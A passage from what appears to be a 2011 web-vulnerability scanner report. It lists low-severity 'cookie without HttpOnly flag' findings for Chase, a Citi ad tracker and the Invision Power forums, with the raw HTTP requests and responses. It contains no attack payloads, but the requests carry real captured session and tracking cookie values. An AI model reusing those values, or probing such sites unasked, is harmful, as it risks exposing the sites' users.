B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/c/?BT_BCID=249224&BT_SID=101294&_u=visitor&_d=http%3A%2F%2Fwww%2Eciti%2Ecom HTTP/1.1 Host: citi.bridgetrack.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; VCC9=; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; VCC1=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; CitiBT%5F9=;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 0 Content-Type: text/html Expires: Tue, 01 Feb 2011 22:09:48 GMT Location: /cbol/_redir.htm?_u=visitor&_d=http://www.citi.com&BTData=402177D7961617455514C45BEBEBEA6A09C928496F1FCF2E9EAC5C2DEA911D83&BT_AS=8&BT_CON=1&BT_TRF=40735&lid=ILC-1110102&cmp=ILC-1110102&venue=citi.com&placement=Topper&product=BusinessChecking&promotion=Q1 Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Date: Wed, 02 Feb 2011 22:09:48 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 21:59:55 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Date: Wed, 02 Feb 2011 21:59:54 GMT Connection: close Content-Length: 2698
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/s/?BT_PID=285778&BT_CON=1&BT_PM=1&r=0.5880183172412217&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 21:59:58 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: AdData=S3C=1&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close Content-Length: 2652
var bt_ad_content285778=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track/?id=28258&random=0.5033922649454325 HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 43 Content-Type: image/GIF Expires: Tue, 01 Feb 2011 21:59:59 GMT Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Set-Cookie: CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /files/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3937-peace/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3939-vietnamese-3xx-lang/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3940-dp31-ihost/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3941-vanilla-valentine/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3942-sos31-file-version-in-online-list/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3943-speed/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3944-ipchat-12-turkish-language-pack/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?app=forums&module=forums&section=markasread&marktype=forum&forumid=1&returntoforumid=0&i=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
